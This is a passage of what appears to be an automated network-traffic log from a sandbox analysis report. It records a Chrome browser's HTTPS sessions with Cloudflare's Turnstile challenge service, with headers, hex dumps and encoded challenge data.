                                                                      cf-chl-out: zzr0tF7hOE3mPwTE8Led5eBfEIm40AQVaT4=$na41bUpA+PxQ3AuB
                                                                      Server: cloudflare
                                                                      CF-RAY: 8fe2913e9a1e423f-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      2025-01-07 08:27:13 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                      Data Ascii: invalid


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      21192.168.2.1649737104.18.95.414436908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2025-01-07 08:27:13 UTC782OUTGET /cdn-cgi/challenge-platform/h/g/i/8fe2912ef9947ce2/1736238432173/8Vh9ItncyZEQ6Vp HTTP/1.1
                                                                      Host: challenges.cloudflare.com
                                                                      Connection: keep-alive
                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                      sec-ch-ua-mobile: ?0
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                      sec-ch-ua-platform: "Windows"
                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                      Sec-Fetch-Site: same-origin
                                                                      Sec-Fetch-Mode: no-cors
                                                                      Sec-Fetch-Dest: image
                                                                      Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/mjn7o/0x4AAAAAAA2OtUsOMReD_Yux/auto/fbE/normal/auto/
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      2025-01-07 08:27:13 UTC200INHTTP/1.1 200 OK
                                                                      Date: Tue, 07 Jan 2025 08:27:13 GMT
                                                                      Content-Type: image/png
                                                                      Content-Length: 61
                                                                      Connection: close
                                                                      Server: cloudflare
                                                                      CF-RAY: 8fe291402cec7279-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      2025-01-07 08:27:13 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 11 00 00 00 14 08 02 00 00 00 e4 c2 41 1e 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                      Data Ascii: PNGIHDRAIDAT$IENDB`


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      22192.168.2.1649739104.18.94.414436908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2025-01-07 08:27:13 UTC428OUTGET /cdn-cgi/challenge-platform/h/g/i/8fe2912ef9947ce2/1736238432173/8Vh9ItncyZEQ6Vp HTTP/1.1
                                                                      Host: challenges.cloudflare.com
                                                                      Connection: keep-alive
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                      Accept: */*
                                                                      Sec-Fetch-Site: none
                                                                      Sec-Fetch-Mode: cors
                                                                      Sec-Fetch-Dest: empty
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      2025-01-07 08:27:13 UTC200INHTTP/1.1 200 OK
                                                                      Date: Tue, 07 Jan 2025 08:27:13 GMT
                                                                      Content-Type: image/png
                                                                      Content-Length: 61
                                                                      Connection: close
                                                                      Server: cloudflare
                                                                      CF-RAY: 8fe29143f8c4422f-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      2025-01-07 08:27:13 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 11 00 00 00 14 08 02 00 00 00 e4 c2 41 1e 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                      Data Ascii: PNGIHDRAIDAT$IENDB`


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      23192.168.2.1649740104.18.95.414436908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2025-01-07 08:27:13 UTC811OUTGET /cdn-cgi/challenge-platform/h/g/pat/8fe2912ef9947ce2/1736238432174/6ed637ccacc930e47539890c4d5436892bfe5524ad06ce89a486f26a8eed1694/fptNhJZvCBcxF8q HTTP/1.1
                                                                      Host: challenges.cloudflare.com
                                                                      Connection: keep-alive
                                                                      Cache-Control: max-age=0
                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                      sec-ch-ua-mobile: ?0
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                      sec-ch-ua-platform: "Windows"
                                                                      Accept: */*
                                                                      Sec-Fetch-Site: same-origin
                                                                      Sec-Fetch-Mode: cors
                                                                      Sec-Fetch-Dest: empty
                                                                      Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/mjn7o/0x4AAAAAAA2OtUsOMReD_Yux/auto/fbE/normal/auto/
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      2025-01-07 08:27:13 UTC143INHTTP/1.1 401 Unauthorized
                                                                      Date: Tue, 07 Jan 2025 08:27:13 GMT
                                                                      Content-Type: text/plain; charset=utf-8
                                                                      Content-Length: 1
                                                                      Connection: close
                                                                      2025-01-07 08:27:13 UTC2015INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 62 74 59 33 7a 4b 7a 4a 4d 4f 52 31 4f 59 6b 4d 54 56 51 32 69 53 76 2d 56 53 53 74 42 73 36 4a 70 49 62 79 61 6f 37 74 46 70 51 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                                                                      Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20gbtY3zKzJMOR1OYkMTVQ2iSv-VSStBs6JpIbyao7tFpQAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                                                      2025-01-07 08:27:13 UTC1INData Raw: 4a
                                                                      Data Ascii: J


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      24192.168.2.1649742104.18.95.414436908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2025-01-07 08:27:15 UTC1170OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/66560694:1736234662:g2tTdhX1N4yQAMduBmEPcwG9Jve5D0zcYbutF1fAQHw/8fe2912ef9947ce2/RbQkraW63v_SNEukALAU7BXWI3qRRiLIwjVM5tIrraQ-1736238430-1.1.1.1-Ed8FZ3WJviBCzb2N6uYl04L6Z4cizB5OXCLfJ8bmEjw8ybsWLhdpWyjuoDzkj_mq HTTP/1.1
                                                                      Host: challenges.cloudflare.com
                                                                      Connection: keep-alive
                                                                      Content-Length: 32588
                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                      Content-type: application/x-www-form-urlencoded
                                                                      CF-Chl-RetryAttempt: 0
                                                                      sec-ch-ua-mobile: ?0
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                      CF-Challenge: RbQkraW63v_SNEukALAU7BXWI3qRRiLIwjVM5tIrraQ-1736238430-1.1.1.1-Ed8FZ3WJviBCzb2N6uYl04L6Z4cizB5OXCLfJ8bmEjw8ybsWLhdpWyjuoDzkj_mq
                                                                      sec-ch-ua-platform: "Windows"
                                                                      Accept: */*
                                                                      Origin: https://challenges.cloudflare.com
                                                                      Sec-Fetch-Site: same-origin
                                                                      Sec-Fetch-Mode: cors
                                                                      Sec-Fetch-Dest: empty
                                                                      Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/mjn7o/0x4AAAAAAA2OtUsOMReD_Yux/auto/fbE/normal/auto/
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      2025-01-07 08:27:15 UTC16384OUTData Raw: 76 5f 38 66 65 32 39 31 32 65 66 39 39 34 37 63 65 32 3d 61 6a 57 56 6b 55 53 62 72 55 72 2d 57 2d 30 53 6d 65 57 56 78 6a 4c 51 34 63 53 4e 34 4d 56 50 57 2d 71 34 33 78 56 55 38 34 45 64 69 4e 34 24 56 6f 50 72 53 51 71 34 76 63 34 2d 4b 45 68 51 55 78 34 37 44 4b 56 34 66 56 65 30 34 47 70 54 53 57 34 46 56 6e 25 32 62 34 56 56 34 32 72 57 6e 62 4b 55 6f 54 75 41 4e 5a 4b 38 34 4a 4e 32 49 62 34 4b 38 53 31 62 78 46 51 56 53 69 4c 42 4b 53 63 76 71 38 34 6a 72 72 78 38 6e 36 4b 34 6e 35 65 24 34 4c 30 34 65 38 34 50 6e 4b 53 50 4f 4c 54 54 34 55 4d 59 6f 30 37 57 76 61 63 37 56 34 67 54 6f 78 2d 38 36 77 67 77 34 6e 61 6a 47 4c 49 74 6f 4e 52 34 53 35 61 56 24 71 41 76 53 34 79 77 62 39 31 75 57 41 6f 31 56 37 36 6d 69 42 65 78 4e 6d 45 46 56 64 50 54
                                                                      Data Ascii: v_8fe2912ef9947ce2=ajWVkUSbrUr-W-0SmeWVxjLQ4cSN4MVPW-q43xVU84EdiN4$VoPrSQq4vc4-KEhQUx47DKV4fVe04GpTSW4FVn%2b4VV42rWnbKUoTuANZK84JN2Ib4K8S1bxFQVSiLBKScvq84jrrx8n6K4n5e$4L04e84PnKSPOLTT4UMYo07Wvac7V4gTox-86wgw4najGLItoNR4S5aV$qAvS4ywb91uWAo1V76miBexNmEFVdPT
                                                                      2025-01-07 08:27:15 UTC16204OUTData Raw: 34 34 50 73 63 61 66 34 64 34 5a 72 4c 32 65 34 34 46 38 77 34 7a 6a 4d 73 37 72 6b 63 34 50 74 69 74 6a 56 34 74 37 50 34 55 57 34 6f 34 78 72 2d 72 34 79 56 65 4a 63 24 72 68 56 7a 4b 2d 43 34 48 30 7a 4d 55 36 34 4e 4b 30 4b 2d 51 34 4c 48 63 72 2d 36 34 77 61 4c 38 53 55 34 57 56 34 31 34 4a 6a 35 38 37 32 34 2b 34 24 4b 7a 4d 55 65 34 62 56 37 56 55 4d 34 30 34 6f 49 68 32 34 4a 46 78 35 45 6f 34 6d 56 78 72 55 45 34 78 56 4c 72 2d 68 56 50 34 7a 32 53 32 4b 5a 56 65 32 34 59 34 4d 56 57 6a 34 56 34 2d 30 77 62 53 52 53 43 6a 6f 39 73 70 34 6e 4b 61 56 34 5a 34 49 36 34 65 53 73 75 57 34 62 69 2d 56 53 31 34 55 57 2d 4b 53 51 34 79 39 56 30 34 63 34 79 57 56 35 55 6d 34 75 56 37 51 34 38 4b 65 56 65 46 30 78 34 62 57 2d 6d 34 37 56 4c 70 2d 31 34 31
                                                                      Data Ascii: 44Pscaf4d4ZrL2e44F8w4zjMs7rkc4PtitjV4t7P4UW4o4xr-r4yVeJc$rhVzK-C4H0zMU64NK0K-Q4LHcr-64waL8SU4WV414Jj58724+4$KzMUe4bV7VUM404oIh24JFx5Eo4mVxrUE4xVLr-hVP4z2S2KZVe24Y4MVWj4V4-0wbSRSCjo9sp4nKaV4Z4I64eSsuW4bi-VS14UW-KSQ4y9V04c4yWV5Um4uV7Q48KeVeF0x4bW-m47VLp-141
                                                                      2025-01-07 08:27:15 UTC318INHTTP/1.1 200 OK
                                                                      Date: Tue, 07 Jan 2025 08:27:15 GMT
                                                                      Content-Type: text/plain; charset=UTF-8
                                                                      Content-Length: 26304
                                                                      Connection: close
                                                                      cf-chl-gen: pXK9tgtzp4+Hz/OoWoU15V02/l3XefJW9KAitV0KvZXEmGuv/nXAEXd+xXC3E82Q33w=$tFn0CUDC5boSnUdT
                                                                      Server: cloudflare
                                                                      CF-RAY: 8fe2914b8ed618ea-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      2025-01-07 08:27:15 UTC1051INData Raw: 66 37 2b 68 6a 37 79 33 67 35 69 69 70 73 61 61 70 4d 57 50 6d 38 7a 47 6e 73 57 4c 6a 4e 6a 4a 6a 35 44 55 6c 5a 69 55 73 37 71 73 31 37 61 7a 75 71 62 65 35 4e 71 6c 6f 36 50 5a 7a 73 4c 70 73 4e 44 46 72 4d 50 6c 74 74 50 4c 31 4d 66 64 7a 63 6a 34 7a 73 33 68 41 4f 37 62 34 63 49 4b 35 64 7a 33 43 74 77 4d 7a 4e 72 77 42 39 7a 47 35 2b 34 51 41 75 77 61 37 65 33 2b 2b 2f 33 36 45 75 76 36 4a 68 54 75 48 68 34 69 36 65 51 6a 4a 69 59 4c 34 67 45 70 4d 54 59 47 4d 67 72 33 4f 76 63 34 39 7a 6b 53 51 50 6c 44 46 7a 35 43 4d 78 38 6f 50 55 68 46 48 79 4a 44 46 79 49 73 43 69 4d 75 49 41 34 54 4e 6a 56 4d 4e 7a 46 4a 4f 7a 74 4f 4d 79 46 41 5a 45 34 31 56 46 64 46 53 55 68 72 54 45 78 69 4b 54 35 53 55 55 56 72 51 47 42 44 62 58 64 4f 56 57 68 79 50 6c 68
                                                                      Data Ascii: f7+hj7y3g5iipsaapMWPm8zGnsWLjNjJj5DUlZiUs7qs17azuqbe5Nqlo6PZzsLpsNDFrMPlttPL1Mfdzcj4zs3hAO7b4cIK5dz3CtwMzNrwB9zG5+4QAuwa7e3++/36Euv6JhTuHh4i6eQjJiYL4gEpMTYGMgr3Ovc49zkSQPlDFz5CMx8oPUhFHyJDFyIsCiMuIA4TNjVMNzFJOztOMyFAZE41VFdFSUhrTExiKT5SUUVrQGBDbXdOVWhyPlh
                                                                      2025-01-07 08:27:15 UTC1369INData Raw: 57 31 62 6d 37 31 72 66 4b 7a 72 4f 59 7a 75 50 65 78 73 48 58 33 4a 76 65 31 63 33 75 79 4f 66 72 33 72 2b 71 78 36 2f 56 39 2f 6e 6b 36 73 2f 52 74 65 6f 42 74 67 44 78 7a 4e 6a 56 76 4e 48 31 77 51 6b 42 42 4f 7a 41 45 51 58 38 41 68 49 47 38 52 50 75 39 64 66 34 45 42 55 48 33 42 51 5a 36 69 44 68 46 77 4d 45 42 42 63 71 41 78 6f 63 48 4f 44 33 47 68 73 51 4a 67 55 71 44 6a 41 31 4f 69 62 30 43 6a 73 31 4e 42 41 75 48 50 6b 56 48 52 55 55 4b 67 67 72 42 30 4e 46 4e 77 73 44 50 6b 55 67 56 45 31 51 4d 68 6c 44 4f 56 68 62 56 52 46 57 4c 31 39 65 58 55 39 53 4f 69 55 7a 53 31 59 70 4a 69 6c 72 50 44 6c 70 4c 32 56 4b 4e 6b 4a 6c 4d 7a 41 37 4f 58 52 51 54 6c 4e 72 66 6e 78 75 68 56 4a 50 68 56 64 38 51 6d 74 56 67 55 64 38 6b 57 78 64 5a 48 5a 75 59 49
                                                                      Data Ascii: W1bm71rfKzrOYzuPexsHX3Jve1c3uyOfr3r+qx6/V9/nk6s/RteoBtgDxzNjVvNH1wQkBBOzAEQX8AhIG8RPu9df4EBUH3BQZ6iDhFwMEBBcqAxocHOD3GhsQJgUqDjA1Oib0Cjs1NBAuHPkVHRUUKggrB0NFNwsDPkUgVE1QMhlDOVhbVRFWL19eXU9SOiUzS1YpJilrPDlpL2VKNkJlMzA7OXRQTlNrfnxuhVJPhVd8QmtVgUd8kWxdZHZuYI
                                                                      2025-01-07 08:27:15 UTC1369INData Raw: 73 72 58 56 32 39 4b 38 31 72 37 44 33 63 71 6a 34 65 71 36 32 4f 4b 2f 30 63 62 78 31 65 48 43 72 65 33 77 72 4e 7a 77 39 62 6a 48 38 38 47 2f 30 4d 33 56 34 2b 66 55 38 37 7a 37 78 4f 48 4b 37 65 49 4c 38 41 59 52 42 4e 45 47 34 74 58 52 43 2b 72 5a 37 66 72 31 32 66 62 72 38 51 2f 30 2b 75 63 6c 42 69 49 4a 46 79 37 68 45 68 34 6b 43 51 73 68 44 52 49 70 38 79 38 64 4d 41 73 6e 44 41 30 57 49 41 30 41 46 68 54 35 4e 67 52 43 4f 54 73 67 48 45 70 4b 53 30 30 50 43 7a 5a 4c 56 44 51 6d 53 69 30 31 55 46 59 76 4d 68 6c 55 57 32 51 32 53 46 49 6b 4f 55 64 46 51 56 68 6e 63 57 73 79 50 58 56 66 59 58 56 6b 55 6e 4a 63 64 53 39 36 5a 31 35 36 62 31 6c 59 68 46 6c 45 66 34 55 38 53 47 56 2f 56 6d 52 4e 62 6c 79 48 55 32 61 44 62 6d 4a 59 65 70 64 32 55 31 69
                                                                      Data Ascii: srXV29K81r7D3cqj4eq62OK/0cbx1eHCre3wrNzw9bjH88G/0M3V4+fU87z7xOHK7eIL8AYRBNEG4tXRC+rZ7fr12fbr8Q/0+uclBiIJFy7hEh4kCQshDRIp8y8dMAsnDA0WIA0AFhT5NgRCOTsgHEpKS00PCzZLVDQmSi01UFYvMhlUW2Q2SFIkOUdFQVhncWsyPXVfYXVkUnJcdS96Z156b1lYhFlEf4U8SGV/VmRNblyHU2aDbmJYepd2U1i
                                                                      2025-01-07 08:27:15 UTC1369INData Raw: 72 79 6c 73 72 57 79 34 4d 71 6a 70 4f 66 6c 75 73 76 42 33 2f 54 78 7a 63 62 4d 78 50 66 77 31 39 50 64 32 72 7a 4d 2b 37 37 45 2b 37 2f 38 30 39 4c 55 37 4e 72 35 41 4f 37 76 41 76 33 64 33 2b 67 4c 43 77 58 55 47 4e 62 50 43 42 6a 62 31 2f 55 50 34 69 44 6c 33 77 41 55 38 67 73 42 2f 75 58 75 47 66 76 77 42 6a 58 6e 47 44 55 6a 43 77 6e 32 45 42 67 75 2b 67 76 36 4f 7a 77 6c 44 6b 45 45 46 51 41 6f 43 44 73 36 52 78 39 47 4d 78 41 2f 54 77 30 30 4c 56 6b 6c 52 56 41 34 4a 78 6f 2b 56 46 51 33 56 79 55 37 4f 6d 6c 64 57 45 78 4c 58 46 31 6b 4f 7a 74 70 4c 30 4d 74 63 54 39 54 5a 57 70 33 4e 6b 35 30 5a 33 68 57 64 44 30 37 66 6f 56 51 55 55 46 68 64 6f 42 4b 56 6d 36 44 57 6c 47 4b 61 6d 68 51 5a 5a 65 56 63 6c 68 32 66 46 42 62 63 6d 78 30 6e 58 4f 56
                                                                      Data Ascii: rylsrWy4MqjpOflusvB3/TxzcbMxPfw19Pd2rzM+77E+7/809LU7Nr5AO7vAv3d3+gLCwXUGNbPCBjb1/UP4iDl3wAU8gsB/uXuGfvwBjXnGDUjCwn2EBgu+gv6OzwlDkEEFQAoCDs6Rx9GMxA/Tw00LVklRVA4Jxo+VFQ3VyU7OmldWExLXF1kOztpL0MtcT9TZWp3Nk50Z3hWdD07foVQUUFhdoBKVm6DWlGKamhQZZeVclh2fFBbcmx0nXOV
                                                                      2025-01-07 08:27:15 UTC1369INData Raw: 62 6b 76 74 6a 4c 72 65 4c 6d 77 38 4c 72 34 73 32 32 37 74 6e 7a 75 64 54 70 39 37 32 2f 36 2f 6a 42 39 75 58 41 2b 4d 6e 31 34 2b 72 4e 32 50 73 4a 41 63 72 6f 7a 42 4c 54 79 74 4d 63 32 64 63 62 31 4e 6f 4b 32 2f 45 45 39 77 34 62 39 4f 45 55 41 79 77 70 47 41 66 37 45 41 6f 54 42 43 49 57 39 51 67 4b 44 53 77 76 4c 53 6b 34 4e 69 41 37 49 30 55 6a 47 7a 4a 46 4f 78 6f 32 4e 7a 38 74 42 30 41 38 52 31 4d 6a 4e 44 59 67 46 45 55 54 56 6c 4e 47 4c 54 78 56 51 68 77 73 55 31 64 44 48 32 6c 58 53 6c 70 56 58 32 46 49 63 56 6c 53 52 47 52 6c 4c 6e 4e 43 56 6e 42 71 4c 6d 6c 79 53 47 39 71 55 6a 78 59 59 6b 46 5a 58 48 74 6e 67 6d 74 35 68 46 31 71 63 49 6c 6b 63 6e 4e 32 56 34 53 43 64 35 64 6b 69 57 31 34 6a 49 36 42 64 58 53 56 59 6e 46 2b 6d 6e 6d 66 68
                                                                      Data Ascii: bkvtjLreLmw8Lr4s227tnzudTp972/6/jB9uXA+Mn14+rN2PsJAcrozBLTytMc2dcb1NoK2/EE9w4b9OEUAywpGAf7EAoTBCIW9QgKDSwvLSk4NiA7I0UjGzJFOxo2Nz8tB0A8R1MjNDYgFEUTVlNGLTxVQhwsU1dDH2lXSlpVX2FIcVlSRGRlLnNCVnBqLmlySG9qUjxYYkFZXHtngmt5hF1qcIlkcnN2V4SCd5dkiW14jI6BdXSVYnF+mnmfh
                                                                      2025-01-07 08:27:15 UTC1369INData Raw: 49 7a 4b 7a 71 77 74 4c 77 78 72 54 57 79 37 76 57 38 65 44 62 76 2f 4c 32 2b 74 44 35 36 41 4c 47 36 77 50 6a 7a 67 4c 75 7a 74 41 43 30 4e 34 5a 42 78 76 7a 36 50 44 55 48 76 54 38 46 41 2f 75 2f 41 4c 7a 2f 41 50 67 36 76 59 48 44 67 51 43 49 77 30 55 42 42 34 73 36 41 30 6b 43 53 38 47 45 78 34 4e 46 53 30 33 4d 6a 41 76 41 45 63 64 4b 44 39 43 41 6a 73 5a 4a 43 51 71 48 67 77 6a 51 77 31 4b 4b 54 55 31 54 6a 4d 32 4b 54 67 74 4e 52 34 76 48 54 38 30 4a 44 39 61 53 55 51 6f 57 31 39 6a 4f 57 4a 52 61 69 39 55 61 30 77 33 61 6c 63 33 4f 57 6f 35 52 34 46 76 4f 58 5a 56 59 46 4a 41 56 32 52 6d 51 32 4e 69 57 58 74 70 5a 6f 53 43 6b 49 5a 52 54 30 2b 46 65 6d 74 59 69 33 35 58 58 59 31 76 58 36 57 53 64 6c 2b 55 6c 5a 39 64 64 49 46 6c 72 6f 57 4a 62 5a
                                                                      Data Ascii: IzKzqwtLwxrTWy7vW8eDbv/L2+tD56ALG6wPjzgLuztAC0N4ZBxvz6PDUHvT8FA/u/ALz/APg6vYHDgQCIw0UBB4s6A0kCS8GEx4NFS03MjAvAEcdKD9CAjsZJCQqHgwjQw1KKTU1TjM2KTgtNR4vHT80JD9aSUQoW19jOWJRai9Ua0w3alc3OWo5R4FvOXZVYFJAV2RmQ2NiWXtpZoSCkIZRT0+FemtYi35XXY1vX6WSdl+UlZ9ddIFlroWJbZ
                                                                      2025-01-07 08:27:15 UTC1369INData Raw: 30 39 54 58 79 64 50 55 32 39 33 62 31 39 6d 38 42 75 44 68 31 74 50 66 35 4d 54 4b 36 65 72 49 44 63 33 76 34 65 2f 69 39 50 62 6e 39 50 66 70 47 76 66 37 37 41 37 34 41 50 4c 33 41 67 50 67 34 67 55 49 49 66 63 44 42 75 6a 71 43 78 45 44 42 41 51 56 42 77 67 50 47 44 45 50 2b 52 77 66 46 42 6f 66 2f 41 63 54 4a 52 59 6b 49 53 67 5a 4f 69 55 70 43 51 73 6e 4d 45 68 53 4c 54 51 52 57 6a 41 79 46 52 73 31 50 53 34 38 50 6b 42 59 59 6a 4e 44 49 57 55 6d 53 47 41 72 52 30 30 2f 52 45 31 51 4c 6b 68 53 56 45 56 6d 55 6c 6c 4b 66 6c 6c 62 4f 6c 42 63 58 54 32 47 59 6c 35 42 52 32 56 6e 52 59 70 6d 62 56 35 4c 58 32 39 4e 56 6c 4a 30 55 5a 5a 6f 65 46 5a 6f 65 6e 78 75 66 48 64 2b 63 5a 4a 39 68 5a 31 30 67 34 69 4b 61 34 61 4d 61 58 4a 75 6b 47 31 7a 69 35 53
                                                                      Data Ascii: 09TXydPU293b19m8BuDh1tPf5MTK6erIDc3v4e/i9Pbn9PfpGvf77A74APL3AgPg4gUIIfcDBujqCxEDBAQVBwgPGDEP+RwfFBof/AcTJRYkISgZOiUpCQsnMEhSLTQRWjAyFRs1PS48PkBYYjNDIWUmSGArR00/RE1QLkhSVEVmUllKfllbOlBcXT2GYl5BR2VnRYpmbV5LX29NVlJ0UZZoeFZoenxufHd+cZJ9hZ10g4iKa4aMaXJukG1zi5S
                                                                      2025-01-07 08:27:15 UTC1369INData Raw: 4e 37 6a 2b 75 48 33 30 2b 62 64 31 50 58 32 37 51 4c 62 42 75 58 63 2f 51 48 31 43 75 4d 4f 37 65 51 47 2f 50 62 72 37 74 6e 2b 2f 52 50 35 2b 4e 30 5a 34 51 51 46 42 43 4d 65 48 77 51 52 42 75 67 79 43 67 6f 45 4b 77 34 4e 38 53 33 31 47 42 72 31 39 68 62 36 50 68 51 32 49 52 77 70 48 67 49 6b 46 53 6b 48 51 56 45 78 52 43 41 76 50 54 4d 77 49 54 6c 4c 4d 78 4d 79 46 6c 49 77 50 79 31 4f 52 44 38 7a 55 53 4a 47 49 56 70 4b 51 69 5a 51 51 47 4a 4e 53 46 46 4b 4c 6d 30 76 54 6a 4a 59 54 46 70 4a 61 6c 78 62 54 31 63 2b 59 54 31 32 65 46 35 44 58 46 78 2b 61 57 52 34 5a 6b 75 4e 53 34 56 6a 55 34 78 7a 55 34 70 73 6a 6e 6c 30 6b 48 5a 61 58 35 68 2f 58 35 56 66 66 6d 4a 6e 6f 49 68 38 6e 6f 43 69 6a 59 69 50 69 6d 35 7a 72 4a 53 49 71 58 4f 53 64 6e 75 30
                                                                      Data Ascii: N7j+uH30+bd1PX27QLbBuXc/QH1CuMO7eQG/Pbr7tn+/RP5+N0Z4QQFBCMeHwQRBugyCgoEKw4N8S31GBr19hb6PhQ2IRwpHgIkFSkHQVExRCAvPTMwITlLMxMyFlIwPy1ORD8zUSJGIVpKQiZQQGJNSFFKLm0vTjJYTFpJalxbT1c+YT12eF5DXFx+aWR4ZkuNS4VjU4xzU4psjnl0kHZaX5h/X5VffmJnoIh8noCijYiPim5zrJSIqXOSdnu0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      25192.168.2.1649743104.18.94.414436908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2025-01-07 08:27:15 UTC597OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/66560694:1736234662:g2tTdhX1N4yQAMduBmEPcwG9Jve5D0zcYbutF1fAQHw/8fe2912ef9947ce2/RbQkraW63v_SNEukALAU7BXWI3qRRiLIwjVM5tIrraQ-1736238430-1.1.1.1-Ed8FZ3WJviBCzb2N6uYl04L6Z4cizB5OXCLfJ8bmEjw8ybsWLhdpWyjuoDzkj_mq HTTP/1.1
                                                                      Host: challenges.cloudflare.com
                                                                      Connection: keep-alive
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                      Accept: */*
                                                                      Sec-Fetch-Site: none
                                                                      Sec-Fetch-Mode: cors
                                                                      Sec-Fetch-Dest: empty
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      2025-01-07 08:27:15 UTC379INHTTP/1.1 404 Not Found
                                                                      Date: Tue, 07 Jan 2025 08:27:15 GMT
                                                                      Content-Type: application/json
                                                                      Content-Length: 7
                                                                      Connection: close
                                                                      cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                      cf-chl-out: PXR1QnOKFNEvJCG6Ltm9WFo5GYjBod3t9po=$fCGfCSyQg6WwgJ/F
                                                                      Server: cloudflare
                                                                      CF-RAY: 8fe29150a97e78d6-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      2025-01-07 08:27:15 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                      Data Ascii: invalid


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      26192.168.2.1649744104.18.95.414436908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2025-01-07 08:27:18 UTC1170OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/66560694:1736234662:g2tTdhX1N4yQAMduBmEPcwG9Jve5D0zcYbutF1fAQHw/8fe2912ef9947ce2/RbQkraW63v_SNEukALAU7BXWI3qRRiLIwjVM5tIrraQ-1736238430-1.1.1.1-Ed8FZ3WJviBCzb2N6uYl04L6Z4cizB5OXCLfJ8bmEjw8ybsWLhdpWyjuoDzkj_mq HTTP/1.1
                                                                      Host: challenges.cloudflare.com
                                                                      Connection: keep-alive
                                                                      Content-Length: 34974
